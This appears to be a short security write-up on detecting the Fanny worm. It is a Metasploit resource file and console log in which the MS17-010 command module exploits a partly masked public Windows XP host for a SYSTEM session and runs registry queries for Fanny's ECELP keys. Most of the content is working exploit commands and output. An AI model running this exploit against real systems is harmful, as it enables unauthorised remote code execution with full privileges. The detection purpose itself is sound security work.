# Detecting Fanny with MetaSploit:


Res.txt # contains code to be executed with resource command
# ---------------------------------------------------------------------------------------------------------------------------------------------------------- #
use auxiliary/admin/smb/ms17_010_command 
set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4"
set RHOSTS 84.xxx.x5.31
run

# ---------------------------------------------------------------------------------------------------------------------------------------------------------- #

msf6  > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command)

msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 84.xxx.x5.31
RHOSTS => 84.xxx.x5.31

msf6 auxiliary(admin/smb/ms17_010_command)   >  set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4"
command => reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4


# ---------------------------------------------------------------------------------------------------------------------------------------------------------- #
# command ready to fire
# ---------------------------------------------------------------------------------------------------------------------------------------------------------- #



msf6 auxiliary(admin/smb/ms17_010_command) > run


[*] 84.xxx.x5.31:445   - Target OS: Windows 5.1                                                        
[*] 84.xxx.x5.31:445   - Connected to named pipe: \netlogon                                            
[*] 84.xxx.x5.31:445   - Filling barrel with fish... done                                                          
[*] 84.xxx.x5.31:445   - <---------------- | Entering Danger Zone | ---------------->                              
[*] 84.xxx.x5.31:445   -     [*] Preparing dynamite...                                                             
[*] 84.xxx.x5.31:445   - Attempt controlling next transaction on x86                                                          
[*] 84.xxx.x5.31:445   -             [*] Trying stick 1 (x86)...Boom!                                                         
[*] 84.xxx.x5.31:445   -     [+] Successfully Leaked Transaction!                                                             
[*] 84.xxx.x5.31:445   -     [+] Successfully caught Fish-in-a-barrel                                                         
[*] 84.xxx.x5.31:445   - <---------------- | Leaving Danger Zone | ---------------->                                          
[*] 84.xxx.x5.31:445   - Reading from CONNECTION struct at: 0x89863330                                                        
[*] 84.xxx.x5.31:445   - Built a write-what-where primitive...                                                                
[*] 84.xxx.x5.31:445   - Overwrote IsNullSession = 0, IsAdmin = 1 at 0xe16f4d04                                               
[*] 84.xxx.x5.31:445   - Found TOKEN addr: 0x3784300552                                                                       
[*] 84.xxx.x5.31:445   - Overwriting _TOKEN UserAndGroups (e18fd8b4)...                                                       
[+] 84.xxx.x5.31:445   - Overwrite complete... SYSTEM session obtained!                                                       
[*] 84.xxx.x5.31:445   - Executing the command...                                                                             
[*] 84.xxx.x5.31:445   - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:84.xxx.x5.31[\svcctl] ...            
[*] 84.xxx.x5.31:445   - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:84.xxx.x5.31[\svcctl] ...              
[*] 84.xxx.x5.31:445   - Obtaining a service manager handle...
[*] 84.xxx.x5.31:445   - Creating the service...
[+] 84.xxx.x5.31:445   - Successfully created the service
[*] 84.xxx.x5.31:445   - Starting the service...
[+] 84.xxx.x5.31:445   - Service start timed out, OK if running a command or non-service executable...
[*] 84.xxx.x5.31:445   - Removing the service...
[+] 84.xxx.x5.31:445   - Successfully removed the service
[*] 84.xxx.x5.31:445   - Closing service handle...
[*] 84.xxx.x5.31:445   - Checking if the file is unlocked...
[*] 84.xxx.x5.31:445   - Getting the command output...
[*] 84.xxx.x5.31:445   - Executing cleanup...
[+] 84.xxx.x5.31:445   - Cleanup was successful
[+] 84.xxx.x5.31:445   - Command completed successfully!
[*] 84.xxx.x5.31:445   - Output for "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4":


! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4
    filter8     REG_BINARY      6C7361737323433A5C57494E444F57535C73797374656D33325C6D73636F7277696E2E646C6C00
    DevNode     REG_DWORD       0x0
    Driver      REG_SZ  c:\WINDOWS\SYSTEM32\ECELP4.ACM
    filter3     REG_BINARY      6578706C6F72657223633A5C77696E646F77735C73797374656D33325C7368656C6C646F632E646C6C00
    filter2     REG_BINARY      77696E6C6F676F6E23633A5C77696E646F77735C4D534167656E745C4147454E544350442E444C4C00



[+] 84.xxx.x5.31:445   - SYSTEM session cleaned up.
[*] 84.xxx.x5.31:445   - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


Of course, there's other variants (As with the many others in "the family")

  /  * -------------------------------------------------------------------------------------------------------------------------------------  * /
      # set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP0"
      # set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP1"
      # set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP2"
      # set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP3"
      # set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4"
      # set command "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP5"
 /  * -------------------------------------------------------------------------------------------------------------------------------------  * /


